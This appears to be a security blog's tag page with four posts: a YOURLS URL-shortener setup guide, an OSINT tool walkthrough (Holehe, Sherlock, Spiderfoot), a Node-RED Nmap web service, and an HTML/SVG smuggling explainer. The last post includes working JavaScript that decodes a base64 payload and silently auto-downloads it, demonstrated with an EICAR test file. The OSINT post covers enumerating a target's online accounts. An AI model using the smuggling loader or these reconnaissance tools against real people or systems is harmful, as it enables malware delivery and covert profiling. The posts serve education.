Tag: code

  • YOURLS: The Ultimate Weapon Against Long URLs

    YOURLS: The Ultimate Weapon Against Long URLs

    Introduction

    Let’s face it: long URLs are the bane of the internet. They’re unsightly, cumbersome, and frankly, nobody enjoys dealing with them. Every time I encounter a URL that stretches longer than a Monday morning, I can’t help but cringe. But here’s the silver lining: you don’t have to endure the tyranny of endless web addresses any longer. Introducing YOURLS—the ultimate weapon in your arsenal against the plague of elongated URLs!

    Imagine having the power to create your own URL shortening service, hosted right on your own domain, complete with every feature you could possibly desire. And the best part? It’s free, open-source, and infinitely customizable. So gear up, because we’re about to transform your domain into a sleek, efficient, URL-shortening powerhouse!

    The Problem with Long URLs

    Before we dive into the solution, let’s talk about why long URLs are such a headache. Not only do they look messy, but they can also be problematic when sharing links on social media, in emails, or on printed materials. Long URLs can break when sent via text message, and they’re nearly impossible to remember. They can also be a security risk, revealing sensitive query parameters. In a digital age where brevity and aesthetics matter, shortening your URLs isn’t just convenient—it’s essential.

    Meet YOURLS: Your URL Shortening Hero

    Enter YOURLS (Your Own URL Shortener), an open-source project that hands you the keys to your own URL kingdom. YOURLS lets you run your very own URL shortening service on your domain, giving you full control over your links and data. No more relying on third-party services that might go down, change their terms, or plaster your links with ads. With YOURLS, you’re in the driver’s seat.

    Why YOURLS Should Be Your Go-To URL Shortener

    YOURLS isn’t just another URL shortening tool—it’s a game-changer. Here’s why:

    • Full Control Over Your Data: Since YOURLS is self-hosted, you own all your data. No more worrying about data privacy or third-party data breaches.
    • Customizable Links: Create custom short URLs that match your branding, making your links not only shorter but also more professional and trustworthy.
    • Powerful Analytics: Get detailed insights into your link performance with historical click data, visitor geo-location, referrer tracking, and more. Understanding your audience has never been easier.
    • Developer-Friendly API: Automate your link management with YOURLS’s robust API, allowing you to integrate URL shortening into your applications seamlessly.
    • Extensible Through Plugins: With a rich plugin architecture, you can enhance YOURLS with additional features like spam protection, social sharing, and advanced analytics. Tailor the tool to fit your exact needs.

    How YOURLS Stacks Up Against Other URL Shorteners

    While YOURLS offers a fantastic solution, it’s worth considering how it compares to other popular URL shorteners out there.

    • Bitly: One of the most well-known services, Bitly offers a free plan with basic features and paid plans for advanced analytics and custom domains. However, you’re dependent on a third-party service, and your data resides on their servers.
    • TinyURL: A simple, no-frills URL shortener that’s been around for ages. It doesn’t offer analytics or customization options, making it less suitable for professional use.
    • Rebrandly: Focused on custom-branded links, Rebrandly offers advanced features but comes with a price tag. Again, your data is stored externally.
    • Short.io: Allows custom domains and offers analytics, but the free tier is limited, and you’ll need to pay for more advanced features.

    Why Choose YOURLS Over the Others?

    • Cost-Effective: YOURLS is free and open-source. No subscription fees or hidden costs.
    • Privacy and Security: Since you host it yourself, you have complete control over your data’s privacy and security.
    • Unlimited Customization: Modify and extend YOURLS to your heart’s content without any limitations imposed by third-party services.
    • Community Support: As an open-source project, YOURLS has a vibrant community that contributes plugins, support, and enhancements.

    Getting Started with YOURLS

    Now that you’re sold on YOURLS, let’s dive into how you can set it up and start conquering those unwieldy URLs.

    Step 1: Setting Up YOURLS with Docker Compose

    To make the installation process smooth and straightforward, we’ll use Docker Compose. This method ensures that all the necessary components are configured correctly and allows for easy management of your YOURLS instance. If you’re new to Docker, don’t worry—it’s simpler than you might think, and it’s a valuable tool to add to your arsenal.

    Creating the docker-compose.yml File

    The docker-compose.yml file orchestrates the services required for YOURLS to run. Here’s the template you’ll use:

    docker-compose.yml
    services:
      yourls:
        image: yourls:latest
        container_name: yourls
        ports:
          - "8081:80" # YOURLS accessible at http://localhost:8081
        environment:
          - YOURLS_SITE=https://yourdomain.com
          - YOURLS_DB_HOST=mysql-yourls
          - YOURLS_DB_USER=${YOURLS_DB_USER}
          - YOURLS_DB_PASS=${YOURLS_DB_PASS}
          - YOURLS_DB_NAME=yourls_db
          - YOURLS_USER=${YOURLS_USER}
          - YOURLS_PASS=${YOURLS_PASS}
        depends_on:
          - mysql-yourls
        volumes:
          - ./yourls_data:/var/www/html/user # Persist YOURLS data
        networks:
          - yourls-network
    
      mysql-yourls:
        image: mysql:latest
        container_name: mysql-yourls
        environment:
          - MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PASSWORD}
          - MYSQL_DATABASE=yourls_db
          - MYSQL_USER=${YOURLS_DB_USER}
          - MYSQL_PASSWORD=${YOURLS_DB_PASS}
        volumes:
          - ./mysql_data:/var/lib/mysql # Persist MySQL data
        networks:
          - yourls-network
    
    networks:
      yourls-network:
        driver: bridge

    Let’s break down what’s happening in this file:

    • Services:
      • yourls: The YOURLS application container. It exposes port 8081 and connects to the MySQL database.
      • mysql-yourls: The MySQL database container that stores all your URL data.
    • Environment Variables: These variables configure your YOURLS and MySQL instances. We’ll store sensitive information in a separate .env file for security.
    • Volumes: Mounts directories on your host machine to persist data even when the containers are recreated.
    • Networks: Defines a bridge network for the services to communicate securely.

    Step 2: Securing Your Credentials with a .env File

    To keep your sensitive information safe, we’ll use a .env file to store environment variables. Create a file named .env in the same directory as your docker-compose.yml file and add the following:

    Bash
    YOURLS_DB_USER=yourls_db_user
    YOURLS_DB_PASS=yourls_db_password
    YOURLS_USER=admin_username
    YOURLS_PASS=admin_password
    MYSQL_ROOT_PASSWORD=your_mysql_root_password

    Pro Tip: Generate strong passwords using the command openssl rand -base64 32. Security is paramount when running web services.
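
    For example, you can generate and append a value in one step (a quick sketch; repeat for each variable):

    Bash
    echo "YOURLS_DB_PASS=$(openssl rand -base64 32)" >> .env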

    Step 3: Launching YOURLS

    With your configuration files in place, you’re ready to bring your YOURLS instance to life. Run the following command in your terminal:

    Bash
    docker compose up -d

    This command tells Docker Compose to start your services in the background (-d for detached mode). Once the containers are up and running, you can access the YOURLS admin interface by navigating to http://yourdomain.com:8081/admin in your web browser. Log in using the credentials you specified in your .env file, and follow the setup wizard to complete the installation.
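
    If you want to verify that everything came up cleanly, these standard Docker Compose commands help:

    Bash
    docker compose ps              # both containers should show as "running"
    docker compose logs -f yourls  # follow the YOURLS startup output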

    Step 4: Securing Your YOURLS Installation with SSL

    Security should never be an afterthought. Protecting your YOURLS installation with SSL encryption ensures that data transmitted between your users and your server remains private.

    Using Let’s Encrypt for Free SSL Certificates

    • Install Certbot: The Let’s Encrypt client that automates certificate issuance.
    • Obtain a Certificate: Run Certbot with the appropriate options to get your SSL certificate (see the sketch below).
    • Configure Your Reverse Proxy: Set up Nginx or Caddy to handle SSL termination.
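
    As a minimal sketch (assuming a Debian-based server and the Nginx plugin; swap in your actual domain), obtaining a certificate can be as simple as:

    Bash
    sudo apt install certbot python3-certbot-nginx
    sudo certbot --nginx -d yourdomain.com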

    My Personal Setup

    I use Nginx Proxy Manager in conjunction with an Origin CA certificate from Cloudflare. This setup provides a user-friendly interface for managing SSL certificates and reverse proxy configurations. For some info on Nginx Proxy Manager check out my other post!

    Using the YOURLS API to Automate Your Workflow

    One of YOURLS’s standout features is its robust API, which allows you to integrate URL shortening into your applications, scripts, or websites. Automate link generation, expansion, and statistics retrieval without manual intervention.

    Examples of Using the YOURLS API with Bash Scripts

    Shortening a URL

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to shorten a URL
    shorten_url() {
      local long_url="$1"
      echo "Shortening URL: $long_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=shorturl&format=json&url=${long_url}"
      echo -e "\n"
    }
    
    shorten_url "https://example.com"

    Expanding a Short URL

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to expand a short URL
    expand_url() {
      local short_url="$1"
      echo "Expanding short URL: $short_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=expand&format=json&shorturl=${short_url}"
      echo -e "\n"
    }
    
    expand_url "https://yourpage.com/2"

    Retrieving URL Statistics

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to get URL statistics
    get_url_stats() {
      local short_url="$1"
      echo "Getting statistics for: $short_url"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=url-stats&format=json&shorturl=${short_url}"
      echo -e "\n"
    }
    
    get_url_stats "https://yourpage.com/2"

    Creating Short URLs with Custom Keywords

    Bash
    #!/bin/bash
    
    YOURLS_API="https://yourpage.com/yourls-api.php"
    API_SIGNATURE="SECRET_SIGNATURE"
    
    # Function to shorten a URL with a custom keyword
    shorten_url_custom_keyword() {
      local long_url="$1"
      local keyword="$2"
      echo "Shortening URL: $long_url with custom keyword: $keyword"
      curl -X GET "${YOURLS_API}?signature=${API_SIGNATURE}&action=shorturl&format=json&url=${long_url}&keyword=${keyword}"
      echo -e "\n"
    }
    
    shorten_url_custom_keyword "https://example.com" "customkeyword"

    Integrating YOURLS API in Other Languages

    While bash scripts are handy, you might prefer to use the YOURLS API with languages like Python, JavaScript, or PHP. There are libraries and examples available in various programming languages, making integration straightforward regardless of your tech stack.
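
    As a minimal sketch of that idea, here is what the shortening call from the Bash examples above could look like in Python with the requests library (the endpoint and signature are placeholders, exactly as before):

    Python
    import requests

    YOURLS_API = "https://yourpage.com/yourls-api.php"
    API_SIGNATURE = "SECRET_SIGNATURE"

    def shorten_url(long_url, keyword=None):
        """Shorten a URL via the YOURLS API and return the parsed JSON."""
        params = {
            "signature": API_SIGNATURE,
            "action": "shorturl",
            "format": "json",
            "url": long_url,
        }
        if keyword:
            # optional custom keyword, same as the keyword= parameter above
            params["keyword"] = keyword
        response = requests.get(YOURLS_API, params=params, timeout=10)
        response.raise_for_status()
        return response.json()

    print(shorten_url("https://example.com"))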

    Supercharging YOURLS with Plugins

    YOURLS’s plugin architecture allows you to extend its functionality to meet your specific needs. Here are some popular plugins to consider:

    • Spam and Abuse Protection
      • reCAPTCHA: Adds Google reCAPTCHA to your public interface to prevent bots.
      • Akismet: Uses the Akismet service to filter out spam URLs.
    • Advanced Analytics
      • Clicks Counter: Provides detailed click statistics and visualizations.
      • GeoIP Tracking: Adds geographical data to your click analytics.
    • Social Media Integration
      • Share via Twitter: Adds a button to share your short links directly on Twitter.
      • Facebook Open Graph: Ensures your short links display correctly on Facebook.
    • Custom URL Keywords and Patterns
      • Random Keyword Generator: Creates more secure and hard-to-guess short URLs.
      • Reserved Keywords: Allows you to reserve certain keywords for special purposes.

    You can find a comprehensive list of plugins in the YOURLS Plugin Repository. Installing plugins is as simple as placing them in the user/plugins directory and activating them through the admin interface.
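
    With the Docker Compose setup from above, the user directory is mounted at ./yourls_data, so installing a plugin could look roughly like this (the repository URL is a placeholder):

    Bash
    # plugins live inside the mounted user/ directory
    cd yourls_data/plugins
    git clone https://github.com/USER/SOME-YOURLS-PLUGIN.git
    # then activate it on the Plugins page of the admin interface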

    Alternative Self-Hosted URL Shorteners

    While YOURLS is a fantastic option, it’s not the only self-hosted URL shortener available. Here are a few alternatives you might consider:

    • Polr: An open-source, minimalist URL shortener with a modern interface. Offers a robust API and can be customized with themes.
    • Kutt: A free and open-source URL shortener with advanced features like custom domains, password-protected links, and detailed statistics.
    • Shlink: A self-hosted URL shortener that provides detailed analytics, QR codes, and REST APIs.

    Each of these alternatives has its own set of features and advantages. Depending on your specific needs, one of them might be a better fit for your project. Based on my experience, YOURLS is by far the easiest and simplest option. I tried the others as well but ultimately chose it.

    Conclusion: Take Back Control of Your URLs Today

    Long URLs have overstayed their welcome, and it’s time to show them the door. With YOURLS, you have the tools to not only shorten your links but to own and control every aspect of them. No more compromises, no more third-party dependencies—just pure, unadulterated control over your online presence.

    So what are you waiting for? Join the revolution against long URLs, set up your YOURLS instance, and start sharing sleek, professional, and memorable links today!

  • Exploring OSINT Tools: From Lightweight to Powerhouse

    Exploring OSINT Tools: From Lightweight to Powerhouse

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to a journey through the exciting world of Open Source Intelligence (OSINT) tools! In this post, we’ll dive into some valuable tools, from the lightweight to the powerhouse, culminating in the grand reveal of Spiderfoot.

    The main star of this post is Spiderfoot, but before we get there, I want to show you some other more lightweight tools you might find useful.

    Holehe

    While perusing one of my favorite OSINT blogs (Oh Shint), I stumbled upon a gem to enhance my free OSINT email tool: Holehe.

    Holehe might seem like a forgotten relic to some, but its capabilities are enduring. Developed by megadose, this tool packs a punch when it comes to unearthing crucial information.

    Sherlock

    Ah, Sherlock – an old friend in my toolkit. I’ve relied on this tool for countless investigations, probably on every single one. The ability to swiftly uncover and validate your targets’ online presence is invaluable.

    Sherlock’s prowess lies in its efficiency. Developed by Sherlock Project, it’s designed to streamline the process of gathering information, making it a staple for OSINT enthusiasts worldwide.

    Introducing Holehe

    First up, let’s shine a spotlight on Holehe, a tool that might have slipped under your radar but packs a punch in the OSINT arena.

    Easy Installation

    Getting Holehe up and running is a breeze. Just follow these simple steps below. I quickly hopped on my Kali test machine and installed it:

    Bash
    git clone https://github.com/megadose/holehe.git
    cd holehe/
    sudo python3 setup.py install

    I’d recommend installing it with Docker, but since I reinstall my demo Kali box every few weeks, it doesn’t matter that I globally install a bunch of Python libraries.

    Running Holehe

    Running Holehe is super simple:

    Bash
    holehe --no-clear --only-used [email protected]

    I used the --no-clear flag so I can just copy my executed command; otherwise, it clears the terminal. I use the --only-used flag because I only care about pages that my target uses.

    Let’s check out the result:

    Bash
    *********************
       [email protected]
    *********************
    [+] wordpress.com
    
    [+] Email used, [-] Email not used, [x] Rate limit, [!] Error
    121 websites checked in 10.16 seconds
    Twitter : @palenath
    Github : https://github.com/megadose/holehe
    For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ
    100%|█████████████████████████████████████████| 121/121 [00:10<00:00, 11.96it/s]

    Sweet! We have a hit! Holehe checked 121 different pages in 10.16 seconds.

    Debugging Holehe

    Running the tool without the --only-used flag is, in my opinion, important for debugging. It seems that a lot of pages rate-limited me or threw errors, so there is a lot of potential for missed accounts here.

    Bash
    *********************
       [email protected]
    *********************
    [x] about.me
    [-] adobe.com
    [-] amazon.com
    [x] amocrm.com
    [-] any.do
    [-] archive.org
    [x] forum.blitzortung.org
    [x] bluegrassrivals.com
    [-] bodybuilding.com
    [!] buymeacoffee.com
    
    [+] Email used, [-] Email not used, [x] Rate limit, [!] Error
    121 websites checked in 10.22 seconds

    (the list is very long, so I removed a lot of the output)

    Personally, I think that since a lot of that code is 2 years old, many of these pages have become a lot smarter about detecting bots, which is why the rate limit gets reached.

    Holehe Deep Dive

    Let us look at how Holehe works by analyzing one of the modules. I picked Codepen.

    Please check out the code. I added some comments:

    Python
    from holehe.core import *
    from holehe.localuseragent import *
    
    
    async def codepen(email, client, out):
        name = "codepen"
        domain = "codepen.io"
        method = "register"
        frequent_rate_limit = False
    
        # adding necessary headers for codepen signup request
        headers = {
            "User-Agent": random.choice(ua["browsers"]["chrome"]),
            "Accept": "*/*",
            "Accept-Language": "en,en-US;q=0.5",
            "Referer": "https://codepen.io/accounts/signup/user/free",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Origin": "https://codepen.io",
            "DNT": "1",
            "Connection": "keep-alive",
            "TE": "Trailers",
        }
    
        # getting the CSRF token for later use, adding it to the headers
        try:
            req = await client.get(
                "https://codepen.io/accounts/signup/user/free", headers=headers
            )
            soup = BeautifulSoup(req.content, features="html.parser")
            token = soup.find(attrs={"name": "csrf-token"}).get("content")
            headers["X-CSRF-Token"] = token
        except Exception:
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": True,
                    "exists": False,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )
            return None
    
        # here is where the supplied email address is added
        data = {"attribute": "email", "value": email, "context": "user"}
    
        # post request that checks if account exists
        response = await client.post(
            "https://codepen.io/accounts/duplicate_check", headers=headers, data=data
        )
    
        # checks response for specified text. If email is taken we have a hit
        if "That Email is already taken." in response.text:
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": False,
                    "exists": True,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )
        else:
            # we land here if email is not taken, meaning no account on codepen
            out.append(
                {
                    "name": name,
                    "domain": domain,
                    "method": method,
                    "frequent_rate_limit": frequent_rate_limit,
                    "rateLimit": False,
                    "exists": False,
                    "emailrecovery": None,
                    "phoneNumber": None,
                    "others": None,
                }
            )

    The developer of Holehe had to do a lot of digging. They had to manually analyze the signup flow of a bunch of different pages to build these modules. You can do this yourself with a tool like OWASP ZAP, Burp Suite, or Postman. It is a lot of manual work, though.

    The issue is that flows like this often change. If Codepen changed the response message or format, this code would fail. That’s the general problem with building web scrapers. If a header name or HTML element is changed, the code fails. This sort of code is very hard to maintain. I am guessing it is why this project has been more or less abandoned.

    Nonetheless, you could easily fix the modules, and this would work perfectly again. I suggest using Python Playwright for the requests; a headless browser is harder to detect and will probably lead to higher success rates.
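
    To illustrate the idea, here is a rough, untested sketch of what a Playwright-based Codepen check could look like; the selector and the timing are assumptions you would need to verify against the live signup form:

    Python
    from playwright.sync_api import sync_playwright

    def email_taken_on_codepen(email):
        """Check Codepen's signup flow with a real headless browser."""
        with sync_playwright() as p:
            browser = p.chromium.launch(headless=True)
            page = browser.new_page()
            page.goto("https://codepen.io/accounts/signup/user/free")
            # hypothetical selector -- inspect the live form and adjust
            page.fill("input[name=email]", email)
            page.keyboard.press("Tab")  # trigger the duplicate-email check
            page.wait_for_timeout(2000)  # crude wait for the XHR round trip
            taken = "That Email is already taken." in page.content()
            browser.close()
            return taken

    print(email_taken_on_codepen("test@example.com"))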

    Sherlock

    Let me introduce you to another tool called Sherlock, which I’ve frequently used in investigations.

    Installation

    I’m just going to install it on my test system. But there’s also a Docker image I’d recommend for a production server:

    Bash
    git clone https://github.com/sherlock-project/sherlock.git
    cd sherlock
    python3 -m pip install -r requirements.txt

    Sherlock offers a plethora of options, and I recommend studying them for your specific case. It’s best used with usernames, but today, we’ll give it a try with an email address.

    Running Sherlock

    Simply run:

    Bash
    python3 sherlock [email protected]

    Sherlock takes a little longer than Holehe, so you need a little more patience. Here are the results of my search:

    Bash
    [*] Checking username [email protected] on:
    
    [+] Archive.org: https://archive.org/details/@[email protected]
    [+] BitCoinForum: https://bitcoinforum.com/profile/[email protected]
    [+] CGTrader: https://www.cgtrader.com/[email protected]
    [+] Chaos: https://chaos.social/@[email protected]
    [+] Cults3D: https://cults3d.com/en/users/[email protected]/creations
    [+] Euw: https://euw.op.gg/summoner/[email protected]
    [+] Mapify: https://mapify.travel/[email protected]
    [+] NationStates Nation: https://nationstates.net/[email protected]
    [+] NationStates Region: https://nationstates.net/[email protected]
    [+] Oracle Community: https://community.oracle.com/people/[email protected]
    [+] Polymart: https://polymart.org/user/[email protected]
    [+] Slides: https://slides.com/[email protected]
    [+] Trello: https://trello.com/[email protected]
    [+] chaos.social: https://chaos.social/@[email protected]
    [+] mastodon.cloud: https://mastodon.cloud/@[email protected]
    [+] mastodon.social: https://mastodon.social/@[email protected]
    [+] mastodon.xyz: https://mastodon.xyz/@[email protected]
    [+] mstdn.io: https://mstdn.io/@[email protected]
    [+] social.tchncs.de: https://social.tchncs.de/@[email protected]
    
    [*] Search completed with 19 results

    At first glance, there are a lot more results. However, upon review, only 2 were valid, which is still good considering this tool is normally not used for email addresses.

    Sherlock Deep Dive

    Sherlock has a really nice JSON file that can easily be edited to add new sites or remove outdated ones. You can check it out at sherlock/resources/data.json.

    This makes it a lot easier to maintain. I use the same approach for my OSINT tools here on this website.

    This is what one of Sherlock’s modules looks like:

    JSON
      "Docker Hub": {
        "errorType": "status_code",
        "url": "https://hub.docker.com/u/{}/",
        "urlMain": "https://hub.docker.com/",
        "urlProbe": "https://hub.docker.com/v2/users/{}/",
        "username_claimed": "blue"
      },

    There’s not much more to it; they basically use these “templates” and test the responses they get from requests sent to the respective endpoints, sometimes by matching text, sometimes by using regex.
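
    As a rough illustration (not Sherlock’s actual code), the status_code error type boils down to something like this:

    Python
    import requests

    # the Docker Hub entry from data.json, reduced to the fields used here
    site = {
        "errorType": "status_code",
        "url": "https://hub.docker.com/u/{}/",
        "urlProbe": "https://hub.docker.com/v2/users/{}/",
    }

    def username_exists(username):
        """For the status_code error type, a 2xx answer on the probe URL
        means the account exists; anything else means it does not."""
        response = requests.get(site["urlProbe"].format(username), timeout=10)
        return 200 <= response.status_code < 300

    if username_exists("blue"):  # "username_claimed" from the template
        print("claimed:", site["url"].format("blue"))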

    Spiderfoot

    Now we get to the star of the show: Spiderfoot. I love Spiderfoot. I use it on every engagement, usually only in Passive mode with just about all the API Keys that are humanly affordable. The only thing I do not like about it is that it actually finds so much information that it takes a while to sort through the data and filter out false positives or irrelevant data. Playing around with the settings can drastically reduce this.

    Installation

    Spiderfoot is absolutely free, and even without API keys for other services, it finds a mind-boggling amount of information. It has saved me countless hours on people investigations; you would not believe it.

    You can find the installation instructions on the Spiderfoot GitHub page. There are also Docker deployments available for this. In my case, it is already pre-installed on Kali, so I just need to start it.

    Bash
    spiderfoot -l 0.0.0.0:8081

    This starts the Spiderfoot webserver, and I can reach it from my network on the IP of my Kali machine on port 8081. In my case, that would be http://10.102.0.11:8081/.

    After you navigate to the address, you will be greeted with this screen:

    I run a headless Kali, so I just SSH into my Kali “server.” If you are following along, you can simply run spiderfoot -l 127.0.0.1:8081 and only expose it on localhost, then browse there on your Kali Desktop.

    Running Spiderfoot

    Spiderfoot is absolutely killer when you add as many API keys as possible. A lot of them are free. Just export the Spiderfoot.cfg from the settings page, fill in the keys, then import it again.

    Important: before you begin, check the settings. Things like port scans are enabled by default. Your target will know you are scanning them. By default, this is not a passive recon tool like the others. You can disable them OR just run Spiderfoot in Passive mode when you configure a new scan.

    My initial scan did not find much info, which is good: the email address I supplied should be absolutely clean. I did want to show you some results, so I started another search with my karlcom.de domain, which is my consulting company.

    By the time the scan was done, it had found over 2000 results linking Karlcom to Exploit and a bunch of other businesses and websites I run. It found my clear name and a whole bunch of other interesting information about what I do on the internet and how things are connected. All that just by putting my domain in without ANY API keys. That is absolutely nuts.

    You get a nice little correlation report at the end (you do not really need to see all the things in detail here):

    Once you start your own Spiderfoot journey, you will have more than enough time to study the results there and see them as big as you like.

    Another thing I did not show you was the “Browse” option. While a scan is running, you can view the results in the web front end and already check for possible other attack vectors or information.

    Summary

    So, what did we accomplish on our OSINT adventure? We took a spin through some seriously cool tools! From the nifty Holehe to the trusty Sherlock and the mighty Spiderfoot, each tool brings its own flair to the table. Whether you’re sniffing out secrets or just poking around online, these tools have your back. With their easy setups and powerful features, Holehe, Sherlock, and Spiderfoot are like the trusty sidekicks you never knew you needed in the digital world.

    Keep exploring, stay curious, and until next time!

  • Node-RED, building Nmap as a Service

    Node-RED, building Nmap as a Service

    Introduction

    In the realm of cybersecurity, automation is not just a convenience but a necessity. Having a tool that can effortlessly construct endpoints and interconnect various security tools can revolutionize your workflow. Today, I’m excited to introduce you to Node-RED, a powerhouse for such tasks.

    This is part of a series of hacking tools automated with Node-RED.

    Setup

    While diving into the intricacies of setting up a Kali VM with Node-RED is beyond the scope of this blog post, I’ll offer some guidance to get you started.

    Base OS

    To begin, you’ll need a solid foundation, which is where Kali Linux comes into play. Whether you opt for a virtual machine setup or use it as the primary operating system for your Raspberry Pi, the choice is yours.

    Running Node-RED

    Once you’ve got Kali Linux up and running, the next step is to install Node-RED directly onto your machine, NOT in a Docker container, since you will need root access to the host system. Follow the installation guide provided by the Node-RED team.

    To ensure seamless operation, I highly recommend configuring Node-RED to start automatically at boot. One effective method to achieve this is by utilizing PM2.

    By following these steps, you’ll have Node-RED set up and ready to streamline your cybersecurity automation tasks.

    Nmap as a Service

    In this section, we’ll create a web service that executes Nmap scans, accessible via a URL like so: http://10.10.0.11:8080/api/v1/nmap?target=exploit.to (Note: Your IP, port, and target will differ).

    Building the Flow

    To construct this service, we’ll need to assemble the following nodes:

    • HTTP In
    • Function
    • Exec
    • Template
    • HTTP Response

    That’s all it takes.

    You can define any path you prefer for the HTTP In node. In my setup, it’s /api/v1/nmap.

    The function node contains the following JavaScript code:

    JavaScript
    msg.scan_options = "-sS -Pn -T3";
    msg.scan_target = msg.payload.target;
    
    msg.payload = msg.scan_options + " " + msg.scan_target;
    return msg;

    It’s worth noting that this scan needs to be run as the root user due to the -sS flag (learn more here). The msg.payload.target parameter holds the ?target= value. In production, it’s crucial to filter and validate input (e.g., domain or IP); for local testing, this suffices.

    The Exec node is straightforward:

    It simply executes Nmap and appends the msg.payload from the previous function node. So, in this example, it results in:

    Bash
    nmap -sS -Pn -T3 exploit.to

    The Template node formats the result for web display using Mustache syntax:

    <pre>
    {{payload}}
    </pre>

    Finally, the HTTP Response node sends the raw Nmap output back to the browser. It’s important to note that this setup isn’t suitable for extensive Nmap scans that take a while, as the browser may timeout while waiting for the response to load.

    You now have a basic Nmap as a Service.

    TODO

    You can go anywhere from here, but I would suggest:

    • Add validation to the endpoint
    • Add features to supply custom Nmap flags
    • Stream results to the browser via WebSocket
    • Save output to a database or file and poll another endpoint to check if done
    • Format output for the web (either greppable Nmap or XML)
    • ChatOps (Discord, Telegram bot)

    Edit 1:

    I ended up adding validation for domain and IPv4. I also modified the target variable. It is now msg.target vs. msg.payload.target.

    JavaScript
    function validateDomain(domain) {
      var domainRegex = /^(?!:\/\/)([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}$/;
      return domainRegex.test(domain);
    }
    
    function validateIPv4(ipv4) {
      var ipv4Regex =
        /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
      return ipv4Regex.test(ipv4);
    }
    
    if (validateDomain(msg.payload.target) || validateIPv4(msg.payload.target)) {
      msg.passed = true;
      msg.target = msg.payload.target;
      return msg;
    }
    
    msg.passed = false;
    return msg;
    

    The flow now looks like this and checks msg.passed: if it is false, it returns an HTTP 400 Bad Request; otherwise, it starts the Nmap scan.

  • Unveiling HTML and SVG Smuggling

    Unveiling HTML and SVG Smuggling

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to the world of cybersecurity, where adversaries are always one step ahead, cooking up new ways to slip past our defenses. One technique that’s been causing quite a stir among hackers is HTML and SVG smuggling. It’s like hiding a wolf in sheep’s clothing—using innocent-looking files to sneak in malicious payloads without raising any alarms.

    Understanding the Technique

    HTML and SVG smuggling is all about exploiting the blind trust we place in web content. We see HTML and SVG files as harmless buddies, used for building web pages and creating graphics. But little do we know, cybercriminals are using them as Trojan horses, hiding their nasty surprises inside these seemingly friendly files.

    How It Works

    So, how does this digital sleight of hand work? Well, it’s all about embedding malicious scripts or payloads into HTML or SVG files. Once these files are dressed up and ready to go, they’re hosted on legitimate websites or sent through seemingly harmless channels like email attachments. And just like that, attackers slip past our defenses, like ninjas in the night.

    Evading Perimeter Protections

    Forget about traditional attack methods that rely on obvious malware signatures or executable files. HTML and SVG smuggling flies under the radar of many perimeter defenses. By camouflaging their malicious payloads within innocent-looking web content, attackers can stroll right past firewalls, intrusion detection systems (IDS), and other security guards without breaking a sweat.

    Implications for Security

    The implications of HTML and SVG smuggling are serious business. It’s a wake-up call for organizations to beef up their security game with a multi-layered approach. But it’s not just about installing fancy software—it’s also about educating users and keeping them on their toes. With hackers getting sneakier by the day, we need to stay one step ahead to keep our digital fortresses secure.

    The Battle Continues

    In the ever-evolving world of cybersecurity, HTML and SVG smuggling are the new kids on the block, posing a serious challenge for defenders. But fear not, fellow warriors! By staying informed, adapting our defenses, and collaborating with our peers, we can turn the tide against these digital infiltrators. So let’s roll up our sleeves and get ready to face whatever challenges come our way.

    Enough theory and talk, let us get dirty! 🏴‍☠️

    Being malicious

    At this point I would like to remind you of my Disclaimer, again 😁.

    I prepared a demo using a simple Cloudflare Pages website; the payload being downloaded is an EICAR test file.

    Here is the Page: HTML Smuggling Demo <- Clicking this will download an EICAR test file onto your computer; if you read the Wikipedia article above, you understand that this could trigger your Anti-Virus (it should).

    Here is the code (I cut part of the payload out, or it would get too big):

    <body>
      <script>
        function base64ToArrayBuffer(base64) {
          var binary_string = window.atob(base64);
          var len = binary_string.length;
    
          var bytes = new Uint8Array(len);
          for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
          }
          return bytes.buffer;
        }
    
        var file = "BASE64_ENCODED_PAYLOAD";
        var data = base64ToArrayBuffer(file);
        var blob = new Blob([data], { type: "octet/stream" });
        var fileName = "eicar.com";
    
        if (window.navigator.msSaveOrOpenBlob) {
          window.navigator.msSaveOrOpenBlob(blob, fileName);
        } else {
          var a = document.createElement("a");
          console.log(a);
          document.body.appendChild(a);
          a.style = "display: none";
          var url = window.URL.createObjectURL(blob);
          a.href = url;
          a.download = fileName;
          a.click();
          window.URL.revokeObjectURL(url);
        }
      </script>
    </body>

    This will create an auto-clicked link on the page, which looks like this:

    <a href="blob:https://2cdcc148.fck-vp.pages.dev/dbadccf2-acf1-41be-b9b7-7db8e7e6b880" download="eicar.com" style="display: none;"></a>

